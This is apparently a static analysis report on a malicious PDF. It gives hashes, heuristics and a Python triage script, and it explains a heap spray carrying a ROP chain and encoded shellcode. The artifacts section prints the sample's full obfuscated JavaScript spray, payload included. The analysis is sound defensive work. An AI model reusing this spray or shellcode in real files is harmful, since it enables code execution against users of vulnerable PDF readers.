Malicious PDF — malware analysis report

Static analysis result for SHA-256 a2c6228f9aa7b6bd…

Verdict: MALICIOUS
File type: PDF
Size: 53.7 KB
First seen: 2026-05-11
MD5: e413b987cf6a37406c095dba0348ae32
SHA-1: c911161ee9ced438204458eae0553a005339c212
SHA-256: a2c6228f9aa7b6bd313a87ad0df61ad16c8dee05fe47b69c6f6b6073ca8b82f9
Risk score: 76

Malware Insights

MITRE ATT&CK
T1059.007 Command and Scripting Interpreter: JavaScript (the report's original mapping to T1059.001 PowerShell is not supported by anything in the sample; the only script present is PDF JavaScript)
T1204.002 User Execution: Malicious File
T1203 Exploitation for Client Execution (candidate, inferred from the heap spray and ROP-style payload; the trigger is not identified in this report)

The PDF was flagged as malicious by the ML classifier with high confidence (Nyx PDF Classifier, 0.9996), and the extracted JavaScript shows why. The /JS stream in object 12 is a heap spray of the classic 0x0c0c0c0c pattern: it aliases unescape(), decodes a %u-escaped payload, builds a filler of 0x0c0c code units, places the payload (0x0c0c-0x24)/2 code units into a 64 KiB chunk so that it sits 0x0c0c bytes from the chunk start once the 0x24-byte string header assumed by the script is counted, grows the chunk to about 1 MiB (0x80000 code units minus a 0x1020-8 byte trim) and stores 0x1f0 (496) copies in an array, roughly 500 MiB of sprayed memory, so that any control-flow transfer to 0x0c0c0c0c lands on the payload. The payload starts with 0x41414141 and then alternates 32-bit values in the 0x4a80xxxx to 0x4a8axxxx range with small constants (0x1000, 0x0002, 0x0102, 0x0040, 0x0022, 0x0030), the layout of a ROP chain assembled from gadgets in a module loaded at a fixed base, and continues with a high-entropy blob that is most likely encoded shellcode. The eight user-defined identifiers are name-mangled. A spray executes nothing by itself; the trigger is not identified in the report, but the 49 KB embedded sfnt font, which the static shellcode scanner also flags, is the most plausible candidate, while the XFA container (objects 13 and 14) holds only an empty form. The URL http://www.bitstream.com appears in document text, most likely as font-vendor metadata carried with the embedded font, and the ns.adobe.com and xfa.org URLs are XML namespace declarations in the XFA stream; none of them is a network indicator for this sample. The second stage cannot be recovered statically: the blob needs shellcode emulation or detonation in a vulnerable PDF reader to identify it.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9996

Heuristics (5)

  • Suspicious extracted artifact (medium) EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action (low, 1 related finding) PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream (low) PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form (low) PDF_XFA
    PDF uses XML Forms Architecture, which can contain script logic.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it.
    • http://www.bitstream.com: in PDF document text. Bitstream is a font vendor; the string most likely travels with the embedded sfnt font and is not a network indicator for this sample.
    • http://ns.adobe.com/xdp/: referenced by PDF JavaScript. XDP namespace URI from the XFA stream (object 14), most likely labelled as JavaScript because the second JavaScript carve runs into that stream; not a contacted host.
    • http://www.xfa.org/schema/xci/2.6/: referenced by PDF JavaScript. XFA config namespace URI, same origin as above.
    • http://www.xfa.org/schema/xfa-template/2.6/: referenced by PDF JavaScript. XFA template namespace URI, same origin as above.
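How keyword heuristics of this kind are produced, as an added triage example. This is not the scanner's code: it re-implements the checks behind PDF_JAVASCRIPT, PDF_JS, PDF_XFA and EMBEDDED_URL (plus the usual /OpenAction, /AA, /Launch and /EmbeddedFile checks, which this report did not fire) and runs them over a mini-PDF constructed for the example, laid out like this sample (object 12 holds the /JS stream, object 13 points /XFA at object 14 with the XDP namespaces listed above) but not taken from it. Hex-escaped names (/#4A#53 for /JS) and FlateDecode streams are handled because both are routinely used to keep the keywords out of a naive grep.

```python
"""Triage example added to this report; it is not the scanner's own code.
Keyword heuristics over the raw body and over every (inflated) stream, with
the channel recorded for each hit the way the report labels its URLs."""
import re
import zlib

HEURISTICS = {
    "PDF_JAVASCRIPT": rb"/JavaScript\b",
    "PDF_JS": rb"/JS\b",
    "PDF_XFA": rb"/XFA\b",
    # extra checks beyond the ones this report fired
    "PDF_OPENACTION": rb"/OpenAction\b",
    "PDF_AA": rb"/AA\b",
    "PDF_LAUNCH": rb"/Launch\b",
    "PDF_EMBEDDEDFILE": rb"/EmbeddedFile\b",
}
_URL = re.compile(rb"https?://[^\s<>\"')\]]+")
# one "N 0 obj << dict >> stream ... endstream"; the tempered (?!endobj) keeps
# the dictionary match from running across object boundaries
_STREAM_OBJ = re.compile(
    rb"(\d+)\s+0\s+obj\s*<<((?:(?!endobj).)*?)>>\s*stream\r?\n(.*?)\r?\nendstream", re.S)


def unescape_names(data: bytes) -> bytes:
    """Resolve #XX hex escapes so /#4A#53 reads as /JS before keyword matching."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def stream_views(pdf: bytes) -> list:
    """(channel, bytes) for every stream object, inflating FlateDecode bodies."""
    views = []
    for m in _STREAM_OBJ.finditer(pdf):
        num, dictionary, body = m.group(1), m.group(2), m.group(3)
        if b"FlateDecode" in dictionary:
            try:
                body = zlib.decompress(body)
            except zlib.error:
                continue                      # truncated or not really deflate
        views.append(("stream object %s" % num.decode(), body))
    return views


def triage(pdf: bytes) -> dict:
    """Apply the heuristics to the name-unescaped file body and to each stream."""
    views = [("document body", unescape_names(pdf))] + stream_views(pdf)
    hits, urls = {}, []
    for channel, data in views:
        for name, pattern in HEURISTICS.items():
            if re.search(pattern, data):
                hits.setdefault(name, []).append(channel)
        for url in _URL.findall(data):
            urls.append((url.decode("latin-1"), channel))
    return {"heuristics": hits, "urls": urls}


def build_sample_pdf() -> bytes:
    """Constructed input (not the analysed sample): the /JS name is hex-escaped,
    the script is deflated, and a plain URL sits in the Info dictionary."""
    js = b"var s = unescape('%u0c0c%u0c0c'); while (s.length < 65536) s += s;"
    js_z = zlib.compress(js)
    xdp = (b'<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">'
           b'<template xmlns="http://www.xfa.org/schema/xfa-template/2.6/"/></xdp:xdp>')
    objs = [
        b"1 0 obj<</Type/Catalog/Pages 2 0 R/OpenAction 11 0 R/AcroForm 13 0 R>>endobj",
        b"2 0 obj<</Type/Pages/Kids[]/Count 0>>endobj",
        b"10 0 obj<</Producer(http://www.bitstream.com)>>endobj",
        b"11 0 obj<</S/JavaScript/#4A#53 12 0 R>>endobj",
        b"12 0 obj<</Length %d/Filter/FlateDecode>>stream\n" % len(js_z)
        + js_z + b"\nendstream\nendobj",
        b"13 0 obj<</XFA 14 0 R>>endobj",
        b"14 0 obj<</Length %d>>stream\n" % len(xdp) + xdp + b"\nendstream\nendobj",
    ]
    return b"%PDF-1.6\n" + b"\n".join(objs) + b"\ntrailer<</Root 1 0 R/Info 10 0 R>>\n%%EOF\n"


if __name__ == "__main__":
    for key, value in triage(build_sample_pdf()).items():
        print(key, value)
```

Run as-is it reports PDF_JAVASCRIPT, PDF_JS, PDF_XFA and PDF_OPENACTION from the document body and lists each URL with the channel it was seen in; the same JavaScript would be invisible to a plain search for "/JS" because of the name escape, and the script text itself is only reachable after inflating object 12.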

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename: javascript_obj0012_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 12 at offset 0xC3C2
Size: 4000 bytes
SHA-256: b36729e562ae5950392d7017562e6dc724945ff3e62abf1e82e6026b105d7bca
Detection
ClamAV: No threats found
Obfuscation or payload: likely
7 of 11 identifiers look randomly generated (e.g. 'txnivcbDOONURCVKojKYuDFqeNQeShrzlMxaUBGN') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var zkaSvrHuoSEdEGwDYbmcaRXRIqAgvxyyFIfwMlrtXAJdhaPWep = unescape;
var txnivcbDOONURCVKojKYuDFqeNQeShrzlMxaUBGNiBzzBspIYraVwuEuxJaXEOXJQfayEasrwxYPdKKqeFlmdnKQBXMcvkMAcv = zkaSvrHuoSEdEGwDYbmcaRXRIqAgvxyyFIfwMlrtXAJdhaPWep( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uc929%uc4da%u74d9%uf424%u6bba%u2b70%u5fe5%u49b1%u5731%u0317%u1757%uc783%u8904%ud785%uc40d%u2866%ub6ce%ucdef%ue4ff%u8694%u3852%ucbde%ub35e%uffb2%ub1d5%u0f1a%u7f5d%u3e7d%u4e5e%uec41%ud19c%uef3d%u31f0%u207f%u3005%u5db8%u60e6%u2911%u9455%u6f16%u9566%ufbf8%uedd6%u3b7d%u47a2%u6c7f%udc1b%u9437%uba17%ua5e7%ud9f4%uecd4%u2971%ueeae%u6053%uc14f%u2e9b%ued6e%u2f11%ucab6%u5ac9%u28cc%u5c77%u5217%ue9a3%uf48a%u4920%u046f%u0fe4%u0ae4%u4441%u0ea2%u8954%u2bd8%u2cdd%uba0f%u0aa5%ue68b%u337e%u428a%u4cd0%u2bcc%ue88d%ude86%u8ada%ub6c4%ua02f%u46f6%ub338%u7485%u6fe7%u3502%ua960%u3ad5%u0d5b%uc549%u6d64%u0243%u3d30%ua3fb%ud639%u4cfb%u78ec%ue2ac%u385f%u431c%ud030%u4c76%uc06f%u8678%u6a18%u4182%u6b2d%ua38d%u6959%ud28d%ue4c5%ube6b%ua0e5%u5724%ue99f%uc6bf%u2460%uc9ba%ucaeb%u873a%ua71b%u7028%uf2ec%ud713%u29f3%ud839%ud561%u8fe8%ud71d%uf8cd%u2881%u7338%ubc0b%uec83%u5074
%ued04%u3a22%u8504%u1e92%ub057%u8bdc%u69cb%u3349%udeba%u5bda%u3840%uc42c%u6fbb%u39ac%u566a%u4b2a%uba18%u41f6' );
var JSvMGadLrnBEaEaKZMsdBuxeDbOedGMoNJGSLpFgfbPSkjlyf = zkaSvrHuoSEdEGwDYbmcaRXRIqAgvxyyFIfwMlrtXAJdhaPWep( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (JSvMGadLrnBEaEaKZMsdBuxeDbOedGMoNJGSLpFgfbPSkjlyf.length + 20 + 8 < 65536) JSvMGadLrnBEaEaKZMsdBuxeDbOedGMoNJGSLpFgfbPSkjlyf+=JSvMGadLrnBEaEaKZMsdBuxeDbOedGMoNJGSLpFgfbPSkjlyf;
oce = JSvMGadLrnBEaEaKZMsdBuxeDbOedGMoNJGSLpFgfbPSkjlyf.substring(0, (0x0c0c-0x24)/2);
oce += txnivcbDOONURCVKojKYuDFqeNQeShrzlMxaUBGNiBzzBspIYraVwuEuxJaXEOXJQfayEasrwxYPdKKqeFlmdnKQBXMcvkMAcv;
oce += JSvMGadLrnBEaEaKZMsdBuxeDbOedGMoNJGSLpFgfbPSkjlyf;
NRvDFMnDSuwWbIyHUvdBuPqwUCpINqzoKDqdGsTKCMyRRpvBxuEWWHRRAmrlPvPtjXdKCjQbLXvsYLuuyKhDNHMgGrGRcpMuy = oce.substring(0, 65536/2);
while(NRvDFMnDSuwWbIyHUvdBuPqwUCpINqzoKDqdGsTKCMyRRpvBxuEWWHRRAmrlPvPtjXdKCjQbLXvsYLuuyKhDNHMgGrGRcpMuy.length < 0x80000) NRvDFMnDSuwWbIyHUvdBuPqwUCpINqzoKDqdGsTKCMyRRpvBxuEWWHRRAmrlPvPtjXdKCjQbLXvsYLuuyKhDNHMgGrGRcpMuy += NRvDFMnDSuwWbIyHUvdBuPqwUCpINqzoKDqdGsTKCMyRRpvBxuEWWHRRAmrlPvPtjXdKCjQbLXvsYLuuyKhDNHMgGrGRcpMuy;
TydLRZkswOoXqqjzEgptZfdnBYardZfbgSgYlLhgbniAgoRyGrppACeuNeOJYc = NRvDFMnDSuwWbIyHUvdBuPqwUCpINqzoKDqdGsTKCMyRRpvBxuEWWHRRAmrlPvPtjXdKCjQbLXvsYLuuyKhDNHMgGrGRcpMuy.substring(0, 0x80000 - (0x1020-0x08) / 2);
var WKDTWvHZhkdBwVrKARtPfMicyQMFjGayFAQvvSKljXrgJaIDfHjaeeSeywKLIlJKATDOvVrzG = new Array();
for (tFWwbZoFNsYOjdgJMqXnynBIFaKKWzHuJslUoyBffCtLKxRWNzcxhQaagZMKdxsSICcWUbinNt=0;tFWwbZoFNsYOjdgJMqXnynBIFaKKWzHuJslUoyBffCtLKxRWNzcxhQaagZMKdxsSICcWUbinNt<0x1f0;tFWwbZoFNsYOjdgJMqXnynBIFaKKWzHuJslUoyBffCtLKxRWNzcxhQaagZMKdxsSICcWUbinNt++) WKDTWvHZhkdBwVrKARtPfMicyQMFjGayFAQvvSKljXrgJaIDfHjaeeSeywKLIlJKATDOvVrzG[tFWwbZoFNsYOjdgJMqXnynBIFaKKWzHuJslUoyBffCtLKxRWNzcxhQaagZMKdxsSICcWUbinNt]=TydLRZkswOoXqqjzEgptZfdnBYardZfbgSgYlLhgbniAgoRyGrppACeuNeOJYc+"s";
Filename: javascript_obj0012_001.js
Kind: pdf-javascript-stream
Source: PDF /JS object 12 at offset 0xC3E4
Size: 4886 bytes
SHA-256: b5ced1c97bc824d780a238cdcb01d57f24ea5dd2acd90e6d2271c33601c84abc
Preview script: the script body of this carve is identical to the one shown above for javascript_obj0012_000.js (it is a second carve of the same object 12 stream, starting 0x22 bytes later and running past the end of the stream). What follows is the PDF material the carver swept up after the script, not JavaScript: the end of object 12, the XFA container (object 13 pointing at the XDP stream in object 14, an empty form1 subform whose namespace URIs are the ones listed under EMBEDDED_URL), and the cross-reference table and trailer.

endstream
endobj
13 0 obj 
<</XFA 14 0 R>>
endobj
14 0 obj 
<</Length 435>>
stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  <config xmlns="http://www.xfa.org/schema/xci/2.6/">
    <present>
      <pdf>
        <interactive>1</interactive>
      </pdf>
    </present>
  </config>
  <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
    <subform name="form1" layout="tb" locale="en_US">
      <pageSet>
      </pageSet>
    </subform>
  </template>
</xdp:xdp>

endstream
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000101 00000 n
0000000192 00000 n
0000000222 00000 n
0000000256 00000 n
0000000355 00000 n
0000000387 00000 n
0000000527 00000 n
0000000649 00000 n
0000000766 00000 n
0000050057 00000 n
0000050114 00000 n
0000054166 00000 n
0000054199 00000 n
trailer
<</Size 15/Root 1 0 R>>
startxref
54685
%%EOF
Filename: font_00_sfnt_off0000032f.bin
Kind: pdf-font-stream
Source: PDF embedded font (sfnt) at offset 0x32F
Size: 49224 bytes
SHA-256: ff08a6d31739411e525f5d1ea2a8bdeb5d0b70b0088b936c8c2c3019156fff50
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x0C